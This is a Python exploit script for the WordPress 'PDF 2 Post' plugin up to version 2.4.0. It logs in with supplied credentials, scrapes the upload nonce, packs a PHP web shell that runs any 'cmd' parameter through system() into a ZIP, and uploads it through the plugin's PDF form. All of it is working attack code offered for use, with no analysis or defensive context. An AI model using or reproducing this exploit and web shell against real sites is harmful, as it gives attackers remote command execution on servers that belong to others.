#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup
import zipfile
import os

# By: Khaled Alenzi (Nxploited)

requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

def log_success(message):
    print(f"[+] {message}")

def log_failure(message):
    print(f"[-] {message}")

def login(url, username, password):
    login_url = url.rstrip("/") + '/wp-login.php'
    payload = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log+In'
    }
    headers = {'User-Agent': user_agent}
    response = session.post(login_url, data=payload, headers=headers)

    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        log_success("Logged in successfully.")
        return True
    else:
        log_failure("Failed to log in.")
        return False

def extract_nonce(page_content):
    soup = BeautifulSoup(page_content, 'html.parser')
    nonce_input = soup.find('input', {'name': 'pdf2post_upload_nonce'})
    if nonce_input and nonce_input.has_attr('value'):
        return nonce_input['value']
    return None

def get_upload_nonce(url):
    target_url = url.rstrip("/") + '/wp-admin/edit.php?page=new-post-from-pdf'
    headers = {'User-Agent': user_agent}
    response = session.get(target_url, headers=headers)
    if response.status_code != 200:
        log_failure("Failed to load upload page.")
        return None
    nonce = extract_nonce(response.text)
    if nonce:
        log_success(f"Found nonce: {nonce}")
    else:
        log_failure("Nonce not found.")
    return nonce

def create_zip_payload(zip_name='Nxploited.zip', php_name='nxploited.php'):
    php_code = """<?php
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
} else {
    echo "Nxploited shell";
}
?>"""
    with open(php_name, "w") as f:
        f.write(php_code)
    with zipfile.ZipFile(zip_name, 'w') as zipf:
        zipf.write(php_name)
    os.remove(php_name)
    log_success(f"Payload {zip_name} created successfully.")

def upload_payload(url, nonce, zip_filename):
    target_url = url.rstrip("/") + '/wp-admin/edit.php?page=new-post-from-pdf'
    with open(zip_filename, 'rb') as f:
        files = {
            'pdf_file_to_upload': (zip_filename, f, 'application/zip')
        }
        data = {
            'pdf2post_upload_nonce': nonce,
            '_wp_http_referer': '/wp-admin/edit.php?page=new-post-from-pdf'
        }
        headers = {
            'User-Agent': user_agent
        }
        response = session.post(target_url, headers=headers, data=data, files=files)

    if response.status_code == 200 and "File uploaded successfully" in response.text:
        log_success("Payload uploaded.")
    else:
        log_failure("Upload failed or payload not processed.")

def main():
    parser = argparse.ArgumentParser(description="Exploit for WordPress PDF 2 Post Plugin <= 2.4.0 # By Nxploited (Khaled Alenazi)")
    parser.add_argument('--url', '-u', required=True, help="Target WordPress site URL")
    parser.add_argument('--username', '-un', required=True, help="Username")
    parser.add_argument('--password', '-p', required=True, help="Password")
    args = parser.parse_args()

    print("Exploit By: Khaled_alenazi (Nxploited)")

    create_zip_payload()

    if not login(args.url, args.username, args.password):
        return

    nonce = get_upload_nonce(args.url)
    if nonce:
        upload_payload(args.url, nonce, "Nxploited.zip")
    else:
        log_failure("Aborting exploit due to missing nonce.")

if __name__ == "__main__":
    main()